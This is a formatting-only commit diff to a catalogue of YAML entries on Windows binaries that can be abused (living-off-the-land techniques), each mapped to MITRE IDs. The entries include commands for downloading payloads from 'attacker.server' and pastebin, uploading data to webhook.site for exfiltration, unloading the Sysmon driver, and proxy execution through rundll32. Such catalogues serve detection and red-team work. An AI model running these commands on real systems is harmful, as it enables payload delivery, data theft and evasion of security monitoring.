Minor formatting changes (redudant backslashes, incorrect dates, typos, etc.)

yml/OSBinaries/AppInstaller.yml

@@ -2,7 +2,7 @@
 Name: AppInstaller.exe
 Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
-Created: '2020-12-02'
+Created: 2020-12-02
 Commands:
   - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>

yml/OSBinaries/Atbroker.yml

@@ -6,7 +6,7 @@ Created: 2018-05-25
 Commands:
   - Command: ATBroker.exe /start malware
     Description: Start a registered Assistive Technology (AT).
-    Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
+    Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.
     Category: Execute
     Privileges: User
     MitreID: T1218

yml/OSBinaries/Cmdl32.yml

@@ -2,7 +2,7 @@
 Name: cmdl32.exe
 Description: Microsoft Connection Manager Auto-Download
 Author: 'Elliot Killick'
-Created: '2021-08-26'
+Created: 2021-08-26
 Commands:
   - Command: cmdl32 /vpn /lan %cd%\config
     Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.

yml/OSBinaries/ConfigSecurityPolicy.yml

@@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows
 Author: 'Ialle Teixeira'
 Created: 2020-09-04
 Commands:
-  - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
     Description: Upload file, credentials or data exfiltration in general
     Usecase: Upload file
     Category: Upload

yml/OSBinaries/DataSvcUtil.yml

@@ -2,9 +2,9 @@
 Name: DataSvcUtil.exe
 Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
 Author: 'Ialle Teixeira'
-Created: '01/12/2020'
+Created: 2020-12-01
 Commands:
-  - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
     Description: Upload file, credentials or data exfiltration in general
     Usecase: Upload file
     Category: Upload

yml/OSBinaries/Dllhost.yml

@@ -2,7 +2,7 @@
 Name: Dllhost.exe
 Description: Used by Windows to DLL Surrogate COM Objects
 Author: 'Nasreddine Bencherchali'
-Created: '2020-11-07'
+Created: 2020-11-07
 Commands:
   - Command: dllhost.exe /Processid:{CLSID}
     Description: Use dllhost.exe to load a registered or hijacked COM Server payload.

yml/OSBinaries/FltMC.yml

@@ -2,7 +2,7 @@
 Name: fltMC.exe
 Description: Filter Manager Control Program used by Windows
 Author: 'John Lambert'
-Created: '2021-09-18'
+Created: 2021-09-18
 Commands:
   - Command: fltMC.exe unload SysmonDrv
     Description: Unloads a driver used by security agents

yml/OSBinaries/IMEWDBLD.yml

@@ -2,7 +2,7 @@
 Name: IMEWDBLD.exe
 Description: Microsoft IME Open Extended Dictionary Module
 Author: 'Wade Hickey'
-Created: '2020-03-05'
+Created: 2020-03-05
 Commands:
   - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>

yml/OSBinaries/MpCmdRun.yml

@@ -18,7 +18,7 @@ Commands:
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows 10
-  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
+  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
     Description: Download file to machine and store it in Alternate Data Stream
     Usecase: Hide downloaded data inton an Alternate Data Stream
     Category: ADS

yml/OSBinaries/OfflineScannerShell.yml

@@ -2,7 +2,7 @@
 Name: OfflineScannerShell.exe
 Description: Windows Defender Offline Shell
 Author: 'Elliot Killick'
-Created: '2021-08-16'
+Created: 2021-08-16
 Commands:
   - Command: OfflineScannerShell
     Description: Execute mpclient.dll library in the current working directory

yml/OSBinaries/OneDriveStandaloneUpdater.yml

@@ -2,7 +2,7 @@
 Name: OneDriveStandaloneUpdater.exe
 Description: OneDrive Standalone Updater
 Author: 'Elliot Killick'
-Created: '2021-08-22'
+Created: 2021-08-22
 Commands:
   - Command: OneDriveStandaloneUpdater
     Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json

yml/OSBinaries/PrintBrm.yml

@@ -2,7 +2,7 @@
 Name: PrintBrm.exe
 Description: Printer Migration Command-Line Tool
 Author: 'Elliot Killick'
-Created: '2021-06-21'
+Created: 2021-06-21
 Commands:
   - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
     Description: Create a ZIP file from a folder in a remote drive

yml/OSBinaries/SettingSyncHost.yml

@@ -2,7 +2,7 @@
 Name: SettingSyncHost.exe
 Description: Host Process for Setting Synchronization
 Author: 'Elliot Killick'
-Created: '2021-08-26'
+Created: 2021-08-26
 Commands:
   - Command: SettingSyncHost -LoadAndRunDiagScript anything
     Description: Execute file specified in %COMSPEC%

yml/OSBinaries/Stordiag.yml

@@ -2,7 +2,7 @@
 Name: Stordiag.exe
 Description: Storage diagnostic tool
 Author: 'Eral4m'
-Created: '2021-10-21'
+Created: 2021-10-21
 Commands:
   - Command: stordiag.exe
     Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.

yml/OSBinaries/WorkFolders.yml

@@ -2,7 +2,7 @@
 Name: WorkFolders.exe
 Description: Work Folders
 Author: 'Elliot Killick'
-Created: '2021-08-16'
+Created: 2021-08-16
 Commands:
   - Command: WorkFolders
     Description: Execute control.exe in the current working directory

yml/OSLibraries/Ieframe.yml

@@ -2,7 +2,7 @@
 Name: Ieaframe.dll
 Description: Internet Browser DLL for translating HTML code.
 Author:
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
     Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

yml/OSLibraries/Setupapi.yml

@@ -2,7 +2,7 @@
 Name: Setupapi.dll
 Description: Windows Setup Application Programming Interface
 Author:
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
     Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
@@ -11,7 +11,7 @@ Commands:
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows
-  - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
+  - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
     Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
     UseCase: Load an executable payload.
     Category: Execute

yml/OSLibraries/Shdocvw.yml

@@ -1,12 +1,12 @@
 ---
 Name: Shdocvw.dll
 Description: Shell Doc Object and Control Library.
-Author:
+Author: Jimmy (@bohops)
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
-    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
-    Usecase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
+    Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL.
+    Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
     Category: Execute
     Privileges: User
     MitreID: T1218.011

yml/OSScripts/CL_mutexverifiers.yml

@@ -4,7 +4,7 @@ Description:
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1
+  - Command: . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1
     Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
     Usecase: Proxy execution
     Category: Execute

yml/OSScripts/Cl_invocation.yml

@@ -4,7 +4,7 @@ Description: Aero diagnostics script
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
-  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
+  - Command: . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
     Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
     Usecase: Proxy execution
     Category: Execute

yml/OtherMSBinaries/Procdump.yml

@@ -2,7 +2,7 @@
 Name: Procdump(64).exe
 Description: SysInternals Memory Dump Tool
 Author: 'Alfie Champion (@ajpc500)'
-Created: '2020-10-14'
+Created: 2020-10-14
 Commands:
   - Command: procdump.exe -md calc.dll explorer.exe
     Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.

yml/OtherMSBinaries/VSIISExeLauncher.yml

@@ -2,7 +2,7 @@
 Name: VSIISExeLauncher.exe
 Description: Binary will execute specified binary. Part of VS/VScode installation.
 Author: 'timwhite'
-Created: '2021-09-24'
+Created: 2021-09-24
 Commands:
   - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
     Description: The above binary will execute other binary.